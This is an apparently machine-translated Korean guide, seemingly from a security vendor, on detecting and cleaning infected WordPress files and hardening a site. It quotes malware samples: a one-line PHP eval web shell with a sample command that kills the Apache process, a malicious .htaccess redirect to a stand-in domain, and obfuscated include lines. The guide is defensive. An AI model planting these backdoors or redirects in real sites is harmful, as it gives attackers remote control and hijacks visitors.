Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

WordPress는 웹사이트 구축을 매우 쉽게 만들고 모든 규모의 개인과 조직이 온라인에서 활동할 수 있도록 해주었습니다.

WordPress 웹 사이트를 호스팅할 때 보안을 관리하는 것이 필수적입니다. 당신이 일어나길 원하는 마지막 일은 아침에 일어나서 당신의 웹사이트가 해킹당하고 당신의 모든 개발과 SEO 노력이 당신이 그것에 대해 알지 못한 채 물거품이 된 것을 발견하는 것입니다 🙁

인기 때문에 해커는 테마 및 플러그인과 함께 WordPress를 대상으로 하는 경향이 있습니다. 한 플러그인에서 취약점을 발견하면 해당 플러그인이 설치된 거의 모든 웹사이트를 쉽게 악용할 수 있습니다.

관련 가이드 – WordPress 맬웨어 제거

Contact Form 7 플러그인의 최근 취약점을 예로 들어 보겠습니다. 취약점이 밝혀진 후 Contact Form WordPress 플러그인을 사용하는 5백만 개 이상의 웹사이트가 취약한 상태로 남아 있는 것으로 추정됩니다. 플러그인의 결함으로 인해 공격자는 웹사이트에서 허용되는 업로드 가능한 파일 유형과 관련된 모든 제한을 우회하여 모든 유형의 파일을 간단히 업로드할 수 있습니다. 또한 공격자가 5.3.1 미만의 Contact Form 7 플러그인 버전을 사용하고 양식에서 파일 업로드를 활성화한 사이트에 웹 셸과 같은 악성 콘텐츠를 삽입할 수 있었습니다.

마찬가지로 해커가 wp-config.php을 다운로드할 수 있게 하는 'Slider Revolution' 플러그인에 LFI 취약점이 있었습니다. 취약한 WordPress 사이트에서. 이로 인해 웹 사이트에 대한 데이터베이스 자격 증명, 암호화 키 및 기타 민감한 구성 정보가 유출되었습니다. 이 wp-config.php 해킹이라고 하기 시작했습니다.

이 가이드에서는 WordPress 사이트에서 해커 및 맬웨어의 대상이 될 수 있는 모든 중요한 파일과 위치에 대해 설명합니다.

1) 워드프레스 wp-config.php 해킹

wp-config.php 모든 WP 설치에 중요한 파일입니다. 사이트에서 사용하는 구성 파일이며 WP 파일 시스템과 데이터베이스 사이의 다리 역할을 합니다. wp-config.php 파일에 다음과 같은 민감한 정보가 포함되어 있습니다.

  • 데이터베이스 호스트
  • 사용자 이름, 비밀번호 및 포트 번호
  • 데이터베이스 이름
  • WordPress용 보안 키
  • 데이터베이스 테이블 접두사

관련 가이드 – WordPress 보안에 대한 단계별 가이드 완료(해킹 위험 90% 감소)

민감한 특성으로 인해 해커들 사이에서 인기 있는 대상입니다. 작년에 WP 플러그인 Duplicator에서 치명적인 결함이 발견되었습니다. . 인증되지 않은 임의 파일 다운로드가 있었습니다. 해커가 wp-config 파일을 다운로드할 수 있는 취약점입니다.

해커가 wp-config.php을 통해 데이터베이스 로그인 세부 정보를 확보하면 해킹, 그들은 데이터베이스에 연결하고 스스로 가짜 WP 관리자 계정을 만들려고 합니다. 이것은 그들에게 웹사이트와 데이터베이스에 대한 완전한 액세스를 제공합니다. 사용자 비밀번호, 이메일 ID, 파일, 이미지, WooCommerce 거래 세부 정보 등과 같은 민감한 데이터는 해커에게 노출됩니다. WordPress 사이트에 계속 액세스하려면 Filesman 백도어와 같은 스크립트를 설치할 수도 있습니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

2) WordPress index.php 해킹됨

index.php 파일은 모든 WordPress 사이트의 진입점입니다. 이것은 사이트의 모든 페이지에서 실행되기 때문에 해커는 전체 웹사이트에 영향을 미치는 악성 코드를 삽입합니다.

예를 들어, pub2srv 멀웨어 및 Favicon 멀웨어 해킹 대상 index.php 파일. Astra Security의 연구원은 이 대규모 확산 맬웨어 리디렉션 캠페인을 모니터링하고 @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; 과 같은 악성 코드가 아래 스크린샷의 코드가 index.php 파일에 추가되었습니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

일부 맬웨어 캠페인은 index.php의 이름도 변경합니다. 파일을 index.php.bak으로 웹 사이트가 충돌하고 전혀 로드되지 않습니다.

이러한 악성코드는 index.php 파일로 인해 웹사이트 방문자에게 이상한 팝업, 광고가 표시되거나 다른 스팸 사이트로 리디렉션될 수 있습니다. 이러한 해킹을 수정하려면 이 파일의 내용을 WordPress에서 릴리스한 원본과 비교하십시오.

관련 가이드 – 궁극적인 WordPress 해킹 제거 가이드

3) WordPress .htaccess 파일 해킹

.htaccess WordPress 웹사이트의 홈 위치에서 자주 발견되는 파일은 웹사이트의 요구 사항에 따라 서버 설정을 구성하는 데 도움이 됩니다. 이것은 종종 Apache 서버에서 발견됩니다. .htaccess 파일은 웹 서버의 성능과 동작을 제어하는 ​​매우 강력한 구성 요소입니다. 웹사이트의 보안을 제어하는 ​​데에도 사용할 수 있습니다. .htaccess의 몇 가지 일반적인 용도 파일:

  • 사이트의 특정 폴더에 대한 액세스 제한
  • 사이트의 최대 메모리 사용량 구성
  • 리디렉션 만들기
  • 강제 HTTPS
  • 캐싱 관리
  • 몇 가지 스크립트 삽입 공격 방지
  • 최대 파일 업로드 크기 제어
  • 봇이 사용자 이름을 찾지 못하도록 차단
  • 이미지 핫링크 차단
  • 파일 자동 다운로드 강제 실행
  • 파일 확장자 관리

그러나 공격을 받을 때 이러한 기능을 사용하여 공격자의 클릭을 수집할 수 있습니다. 종종 .htaccess 파일에 사용자를 리디렉션하는 악성 코드가 주입됩니다. 때로는 사용자에게 스팸을 표시하는 데 사용됩니다. 예를 들어 아래 주어진 코드를 보십시오:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
 RewriteRule .* https://MaliciousDomain.tld/bad.php?t=3 [R,L]

마지막 줄의 악성 코드는 사이트에서 사용자 트래픽을 리디렉션하고 있습니다. 결과적으로 사용자는 https://MaliciousDomain.tld로 리디렉션됩니다. . 그런 다음 bad.php 로드를 시도합니다. 스크립트. 사이트에서 비정상적인 리디렉션이 발견되면 .htaccess 파일 해킹. 그러나 파일을 찾을 수 없거나 비어 있는 경우 이 파일이 필수가 아니므로 당황하지 마십시오(WordPress에서 예쁜 URL을 사용하지 않는 한).

각 WordPress 테마에는 footer.php이라는 파일이 있습니다. 및 header.php 사이트의 바닥글과 머리글에 대한 코드가 있습니다. 이 영역에는 웹사이트 전체에서 동일하게 유지되는 스크립트 및 특정 위젯이 포함됩니다. 예를 들어 웹사이트 하단에 있는 공유 위젯이나 소셜 미디어 위젯이 있습니다. 또는 때때로 저작권 정보, 크레딧 등이 될 수 있습니다.

따라서 이 두 파일은 공격자의 표적이 될 수 있는 중요한 파일입니다. digestcolect의 경우와 같이 맬웨어 리디렉션 및 스팸 콘텐츠 표시에 자주 사용됩니다. [.com] 악성코드 리디렉션 .

아래 스크린샷에서 볼 수 있듯이 해킹된 사이트에는 이러한 파일에 의미 없는 코드가 포함될 수 있습니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

우리는 이 중 일부를 해독하고 브라우저 쿠키를 활용하여 사용자를 식별하고 악성 광고 등을 보여주는 해커를 발견했습니다.

또한 다른 경우에 공격자는 확장자가 .js인 모든 파일에 JavaScript 코드를 삽입했습니다. 대규모 감염으로 인해 이러한 해킹을 치료하기가 어려운 경우가 많습니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

5) WordPress functions.php 해킹됨

테마 폴더 내의 함수 파일은 플러그인처럼 작동합니다. 즉, WordPress 사이트에 추가 기능을 추가하는 데 사용할 수 있습니다. 파일 functions.php 다음 용도로 사용할 수 있습니다.

  • WordPress 이벤트/함수 호출
  • 기본 PHP 함수를 호출합니다.
  • 또는 고유한 기능을 정의합니다.

functions.php 파일은 모든 테마와 함께 제공되지만 주어진 시간에 functions.php 활성 테마에 있는 파일이 실행됩니다. 이 때문에 functions.php 파일은 Wp-VCD 백도어 해킹에서 공격자의 적극적인 표적이 되었습니다. 이 멀웨어는 새로운 관리자를 만들고 사이트에 Pharma 및 Japanese SEO 스팸과 같은 스팸 페이지를 삽입했습니다.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

위의 코드에서 알 수 있듯이 이 파일에는 class.theme-modules.php가 포함되어 있습니다. 파일. 그런 다음 이 파일은 사이트에 설치된 다른 테마에 멀웨어를 설치하는 데 사용됩니다(비활성화된 경우에도). 따라서 새로운 사용자와 백도어를 생성합니다. 이를 통해 공격자는 파일이 정리된 후에도 사이트에 액세스할 수 있습니다.

6) WordPress wp-load.php 해킹됨

wp-load.php 모든 WordPress 사이트의 중요한 파일입니다. wp-load.php 파일은 WordPress 환경을 부트스트랩하는 데 도움이 되며 플러그인에 기본 WP 핵심 기능을 사용할 수 있는 기능을 제공합니다. 많은 악성 코드 변종은 China Chopper 웹 셸 악성 코드의 경우에서 볼 수 있듯이 악성 wp-load 파일을 생성하여 WordPress 사이트를 감염시킵니다. 이 일반적인 동작은 wp-load-eFtAh.php와 같은 파일을 생성하는 것이었습니다. 서버에. 이름이 원본 파일의 이름과 비슷하기 때문에 FTP에 로그인했을 때 의심스러운 파일을 찾지 못했을 수도 있습니다. 이러한 파일에는 다음과 같은 코드가 포함됩니다.

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

이 코드를 통해 공격자는 pass에서 해커가 보낸 모든 PHP 코드를 사이트에서 실행할 수 있습니다. 매개변수. 이 백도어를 사용하면 유해한 명령이 실행될 수 있습니다. 예를 들어 명령 — https://yoursite/your.php?pass=system("killall -9 apache"); 웹 서버 프로세스를 종료할 수 있습니다. 이렇게 하면 전체 서버가 종료될 수 있습니다. 이 코드를 길이로 판단하지 마십시오. 서버를 원격으로 제어하기에 충분히 위험합니다.

7) 서버의 class-wp-cache.php 파일 홍수

최근 해킹 중 하나에서 cPanel과 전체 웹 서버가 수십 또는 수천 개의 class-wp-cache.php 파일. 코어 파일을 포함한 웹사이트의 모든 폴더가 이러한 악성 파일에 감염됩니다. 일반적으로 이 감염의 원인은 해커의 유입구를 여는 웹사이트 코드의 취약점입니다.

WordPress 파일 정리 및 보안을 수행하는 방법

1) 파일 정리

먼저 wp-config.php 해킹과 같은 공격의 원인을 조사하십시오. 그런 다음 악성/횡설수설 코드를 제거합니다. 둘째, 백업에서 감염된 파일을 복원하십시오. 백업을 사용할 수 없는 경우 GitHub에서 원본 WordPress 파일을 확인할 수 있습니다. 변경하기 전에 파일을 백업하는 것을 잊지 마십시오. 코드 제거 과정에서 실수가 발생하면 사이트가 손상될 수 있습니다.

2) 플러그인을 사용하여 사이트 보안

이러한 해킹으로 핵심 CMS 파일은 종종 해커에 의해 수정됩니다. 핵심 WordPress 파일이 수정되었는지 확인하는 것이 중요합니다. Astra Security 고객은 이미 이 기능을 가지고 있으며 이러한 변경 사항이 감지되면 자동으로 알림을 받습니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

Astra Security는 또한 이러한 파일 변경 사항을 검토하기 위한 내장된 검토 메커니즘을 제공합니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

핵심 시스템 파일의 변경 사항을 검토한 후 Astra Website Protection과 같은 맬웨어 검사 솔루션으로 사이트를 검사하여 악성 콘텐츠가 포함된 파일을 식별해야 합니다. 이러한 도구는 맬웨어 파일, 악성 링크, 해킹 이유 등에 대한 전체 검사 보고서를 제공합니다.

3) 민감한 파일 숨기기

엿보는 눈에 파일을 노출하면 wp-config.php에 대해 이야기한 것처럼 민감한 정보가 드러날 수 있습니다. 이 기사에서 해킹. 따라서 서버에서 이러한 파일을 숨길 필요가 있습니다. .htaccess 파일은 이러한 파일을 보호하는 데 도움이 될 수 있습니다.

다른 사람이 wp-content/uploads의 PHP 파일에 액세스하지 못하도록 하려면 폴더에서 .htaccess을 만들 수 있습니다. wp-content/uploads의 파일 폴더에 다음 코드를 추가합니다.

# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all
</Files>

wp-includes에서 민감한 파일을 숨기려면 폴더에서 .htaccess에 다음 코드를 추가합니다. 사이트 루트에 있는 파일:

# Block wp-includes folder and files
 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]
 </IfModule>

이 전체 프로세스를 건너뛰고 WP Hardening 플러그인만 설치하도록 선택할 수도 있습니다. 이 플러그인은 버튼을 토글하여 wp-contents, wp-uploads 등과 같은 민감한 파일을 숨깁니다. 이 WP-Hardening에 추가하면 웹사이트의 다른 여러 중요한 보안 영역을 보호하는 데 도움이 되어 공격자가 민감한 정보를 식별하고 악용하기 어렵게 만듭니다.

관련 가이드 – WordPress 맬웨어 제거에 대한 단계별 가이드

4) 워드프레스 업데이트

항상 WP 설치, 플러그인 및 테마를 최신 상태로 유지하십시오. 업데이트된 설치를 실행하여 많은 허점을 막을 수 있습니다. 평판이 좋은 플러그인과 테마만 사용하세요. 잘못 코딩되거나 null이 된 테마는 피하세요. 이렇게 하면 wp-config.php과 같은 공격이 유지됩니다. 해킹.

이를 더 잘 설명하기 위해 WordPress 사이트를 보호하기 위한 전체 단계별 비디오를 만들었습니다.

5) WordPress 방화벽 사용

방화벽은 사이트 보안에 큰 도움이 됩니다. 방화벽은 사이트에서 들어오는 트래픽을 모니터링하고 감염을 차단하기 위한 예방 조치를 취할 수 있습니다. wp-config.php과 같은 공격을 효과적으로 방지할 수 있습니다. 마구 자르기. 오늘날 시장에는 여러 가지 비용 효율적인 방화벽 솔루션이 있습니다. Astra Security의 보안은 유연하고 귀하의 요구에 적합합니다.

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

Astra 방화벽은 SQLi, 코드 주입, XSS, CSRF 및 기타 100개 이상의 사이버 위협과 같은 공격을 실시간으로 차단합니다. 또한 인스턴스에 대한 비정상적이고 가짜 로그인을 감지 및 차단하고 웹사이트를 자동으로 정기적으로 검사합니다.

6) WordPress 보안 감사 또는 펜 테스트

WordPress가 가장 널리 사용되는 CMS이므로 보안 문제가 증가하기 때문에 공격자는 항상 WordPress 웹사이트에서 악용 가능한 취약점을 찾아 헤매고 있습니다. 결과적으로 WordPress 사이트를 공격으로부터 안전하게 유지하려면 Pen-Testing이 필수가 되었습니다.

침투 테스트는 웹 응용 프로그램, 네트워크 또는 컴퓨터 시스템에 대해 수행되는 모의 공격으로 보안을 평가하고 공격자보다 먼저 취약점을 찾아 보호하는 데 도움이 됩니다. WordPress 사이트를 Pen-Testing하는 동안 수행된 다른 시뮬레이션된 공격 중 하나는 기본적으로 wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content 등을 포함하여 공격자에게 민감한 정보를 제공할 수 있습니다.

무료 WP 강화 플러그인을 사용하여 클릭 한 번으로 12개 이상의 보안 문제 해결

감염된 WordPress 파일 검사 및 수정 방법(wp-config.php 및 wp-content/uploads)

관련 가이드 – WordPress 보안에 대한 단계별 가이드 완료(해킹 위험 90% 감소)